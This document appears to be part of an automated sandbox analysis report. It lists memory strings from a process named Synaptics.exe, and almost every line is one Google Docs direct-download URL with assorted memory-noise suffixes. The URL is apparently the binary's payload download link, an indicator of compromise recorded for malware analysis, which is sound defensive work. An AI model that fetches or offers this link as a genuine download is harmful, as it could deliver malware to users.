                              Source: Synaptics.exe, 00000003.00000002.1832097096.000000000EF52000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1833098836.000000000EFCF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1821129829.00000000099FE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1811023500.0000000005AEE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1810620451.000000000571E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1820410110.0000000008FFE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1808025364.000000000529E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1820856204.000000000963E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1821422598.0000000009DBE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1441798658.0000000000593000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1822052391.000000000A67E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1820591005.000000000927E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1807836357.000000000501E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1807922973.000000000515E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1820770305.00000000094FE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1821032264.00000000098BE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1820679100.00000000093BE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1821341399.0000000009C7E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1821862712.000000000A3FE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1821593330.000000000A03E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1821505482.0000000009EFE000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadM
                              Source: Synaptics.exe, 00000003.00000002.1815613823.0000000007B83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadM.
                              Source: Synaptics.exe, 00000003.00000002.1815613823.0000000007B83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadMR
                              Source: Synaptics.exe, 00000003.00000002.1804199297.0000000000565000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadMT
                              Source: Synaptics.exe, 00000003.00000002.1833098836.000000000EFCF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1835707471.000000000F12A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1814105855.0000000007A2C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1815613823.0000000007B41000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1815613823.0000000007ABB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadN
                              Source: Synaptics.exe, 00000003.00000002.1815613823.0000000007B83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadN/
                              Source: Synaptics.exe, 00000003.00000002.1815613823.0000000007B83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadNS
                              Source: Synaptics.exe, 00000003.00000002.1833098836.000000000EFCF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadNn
                              Source: Synaptics.exe, 00000003.00000002.1832097096.000000000EF52000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1835707471.000000000F12A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadO
                              Source: Synaptics.exe, 00000003.00000002.1804199297.0000000000565000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1441798658.000000000057F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadOpm-
                              Source: Synaptics.exe, 00000003.00000002.1815613823.0000000007BDF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1833098836.000000000EFCF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1835707471.000000000F12A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1804199297.000000000051D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1804199297.0000000000565000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1815613823.0000000007ABB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1834388588.000000000F079000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadP
                              Source: Synaptics.exe, 00000003.00000003.1441798658.0000000000593000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1804199297.0000000000594000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1404566857.00000000005A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadP$f-
                              Source: Synaptics.exe, 00000003.00000002.1815613823.0000000007B83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadP/
                              Source: Synaptics.exe, 00000003.00000002.1834388588.000000000F079000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadPb
                              Source: Synaptics.exe, 00000003.00000002.1833098836.000000000EFCF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadPn
                              Source: Synaptics.exe, 00000003.00000002.1835707471.000000000F12A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadQ
                              Source: Synaptics.exe, 00000003.00000002.1815613823.0000000007B83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadQW
                              Source: Synaptics.exe, 00000003.00000002.1804199297.0000000000565000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1441798658.000000000057F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadQps-
                              Source: Synaptics.exe, 00000003.00000002.1832097096.000000000EF52000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1833098836.000000000EFCF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1835707471.000000000F12A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1814105855.0000000007A2C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1804199297.000000000054D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1815613823.0000000007B41000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadR
                              Source: Synaptics.exe, 00000003.00000002.1815613823.0000000007B83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadRT
                              Source: Synaptics.exe, 00000003.00000002.1832097096.000000000EF52000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1815613823.0000000007B41000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1834388588.000000000F097000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1808081146.00000000052A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadS
                              Source: Synaptics.exe, 00000003.00000002.1804199297.0000000000565000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadSec-C
                              Source: Synaptics.exe, 00000003.00000002.1833098836.000000000EFCF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadSj
                              Source: Synaptics.exe, 00000003.00000002.1815613823.0000000007BDF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1833098836.000000000EFCF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1835707471.000000000F12A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadT
                              Source: Synaptics.exe, 00000003.00000002.1815613823.0000000007B83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadTV
                              Source: Synaptics.exe, 00000003.00000002.1834388588.000000000F079000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadTc
                              Source: Synaptics.exe, 00000003.00000003.1439557060.0000000005333000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1808081146.0000000005339000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadThe
                              Source: Synaptics.exe, 00000003.00000002.1808081146.0000000005339000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadThz
                              Source: Synaptics.exe, 00000003.00000002.1804199297.0000000000565000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1441798658.000000000057F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadTst
                              Source: Synaptics.exe, 00000003.00000003.1439557060.0000000005333000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1815613823.0000000007B41000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1808081146.0000000005339000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1815613823.0000000007ABB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadU
                              Source: Synaptics.exe, 00000003.00000002.1833098836.000000000EFCF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadUl
                              Source: Synaptics.exe, 00000003.00000002.1804199297.0000000000565000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadUmh.4
                              Source: Synaptics.exe, 00000003.00000002.1833098836.000000000EFCF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1815613823.0000000007B41000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1815613823.0000000007ABB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadV
                              Source: Synaptics.exe, 00000003.00000003.1441798658.000000000057F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadVl
                              Source: Synaptics.exe, 00000003.00000002.1833098836.000000000EFCF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadVm
                              Source: Synaptics.exe, 00000003.00000002.1832097096.000000000EF52000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1833098836.000000000EFCF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1804199297.000000000051D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadW
                              Source: Synaptics.exe, 00000003.00000002.1815613823.0000000007B83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadW.
                              Source: Synaptics.exe, 00000003.00000002.1815613823.0000000007B83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadWR
                              Source: Synaptics.exe, 00000003.00000002.1832097096.000000000EF52000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1815613823.0000000007BDF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1833098836.000000000EFCF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1441798658.0000000000593000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1804199297.0000000000594000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1404566857.00000000005A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadX
                              Source: Synaptics.exe, 00000003.00000002.1815613823.0000000007B83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadX.
                              Source: Synaptics.exe, 00000003.00000002.1815613823.0000000007B83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadXR
                              Source: Synaptics.exe, 00000003.00000002.1834388588.000000000F079000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadXa
                              Source: Synaptics.exe, 00000003.00000002.1834388588.000000000F079000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadXd
                              Source: Synaptics.exe, 00000003.00000002.1832097096.000000000EF52000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1835707471.000000000F12A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1439557060.0000000005333000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1808081146.0000000005339000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadY
                              Source: Synaptics.exe, 00000003.00000002.1815613823.0000000007B83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadYV
                              Source: Synaptics.exe, 00000003.00000002.1833098836.000000000EFCF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1441798658.0000000000593000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1814105855.0000000007A2C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1808081146.0000000005339000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1804199297.0000000000594000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1404566857.00000000005A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadZ
                              Source: Synaptics.exe, 00000003.00000002.1815613823.0000000007B83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadZW
                              Source: Synaptics.exe, 00000003.00000002.1815613823.0000000007B83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadZgDzs4RH)S
                              Source: Synaptics.exe, 00000003.00000002.1804199297.0000000000565000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1441798658.000000000057F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadZpf-
                              Source: Synaptics.exe, 00000003.00000002.1832097096.000000000EF52000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1833098836.000000000EFCF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1835707471.000000000F12A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download_
                              Source: Synaptics.exe, 00000003.00000002.1815613823.0000000007B83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download_Q
                              Source: Synaptics.exe, 00000003.00000002.1815613823.0000000007B83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download_U
                              Source: Synaptics.exe, 00000003.00000002.1835707471.000000000F12A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1815613823.0000000007B83000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1439557060.0000000005333000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1808081146.0000000005339000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1834388588.000000000F079000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloada
                              Source: Synaptics.exe, 00000003.00000002.1834388588.000000000F079000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadaHe
                              Source: Synaptics.exe, 00000003.00000002.1815613823.0000000007B83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadaP
                              Source: Synaptics.exe, 00000003.00000002.1804199297.0000000000565000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadaRUzr
                              Source: Synaptics.exe, 00000003.00000002.1804199297.0000000000565000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadal
                              Source: Synaptics.exe, 00000003.00000002.1804199297.0000000000565000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadal$-
                              Source: Synaptics.exe, 00000003.00000002.1815613823.0000000007B83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadal=YC
                              Source: Synaptics.exe, 00000003.00000002.1804199297.0000000000565000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1441798658.000000000057F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadancis
                              Source: Synaptics.exe, 00000003.00000003.1441798658.000000000057F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadany
                              Source: Synaptics.exe, 00000003.00000002.1804199297.0000000000565000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadap
                              Source: Synaptics.exe, 00000003.00000002.1808081146.0000000005339000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadaptc
                              Source: Synaptics.exe, 00000003.00000002.1804199297.0000000000565000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadarch=Eo
                              Source: Synaptics.exe, 00000003.00000002.1804199297.0000000000565000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadase-
                              Source: Synaptics.exe, 00000003.00000002.1833098836.000000000EFCF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadation
                              Source: Synaptics.exe, 00000003.00000003.1441798658.0000000000593000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1814105855.0000000007A2C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1804199297.0000000000594000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1815613823.0000000007ABB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadb
                              Source: Synaptics.exe, 00000003.00000002.1804199297.000000000054D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadbdn.
                              Source: Synaptics.exe, 00000003.00000002.1833098836.000000000EFCF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadbl9.
                              Source: Synaptics.exe, 00000003.00000002.1832097096.000000000EF52000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1835707471.000000000F12A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadc
                              Source: Synaptics.exe, 00000003.00000002.1815613823.0000000007B83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcU
                              Source: Synaptics.exe, 00000003.00000003.1439557060.0000000005333000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcaptc
                              Source: Synaptics.exe, 00000003.00000002.1833098836.000000000EFCF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcatio
                              Source: Synaptics.exe, 00000003.00000002.1815613823.0000000007B83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadch-u
                              Source: Synaptics.exe, 00000003.00000002.1804199297.0000000000565000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadch-uPo
                              Source: Synaptics.exe, 00000003.00000002.1833098836.000000000EFCF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadch-uazm
                              Source: Synaptics.exe, 00000003.00000002.1808081146.0000000005339000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcn
                              Source: Synaptics.exe, 00000003.00000002.1804199297.000000000054D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcn.c
                              Source: Synaptics.exe, 00000003.00000002.1804199297.0000000000565000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcom/dNo
                              Source: Synaptics.exe, 00000003.00000003.1439557060.0000000005333000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1808081146.0000000005339000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcom0
                              Source: Synaptics.exe, 00000003.00000002.1815613823.0000000007B83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcsV
                              Source: Synaptics.exe, 00000003.00000002.1804199297.0000000000565000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcy:
                              Source: Synaptics.exe, 00000003.00000002.1815613823.0000000007BDF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1835707471.000000000F12A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadd
                              Source: Synaptics.exe, 00000003.00000003.1441798658.0000000000593000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1804199297.0000000000594000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1404566857.00000000005A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadd$
                              Source: Synaptics.exe, 00000003.00000002.1815613823.0000000007B83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadd/
                              Source: Synaptics.exe, 00000003.00000002.1815613823.0000000007B83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaddS
                              Source: Synaptics.exe, 00000003.00000002.1834388588.000000000F079000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadde
                              Source: Synaptics.exe, 00000003.00000002.1815613823.0000000007B83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaddel=
                              Source: Synaptics.exe, 00000003.00000002.1833098836.000000000EFCF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaddn
                              Source: Synaptics.exe, 00000003.00000002.1834388588.000000000F079000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadd~
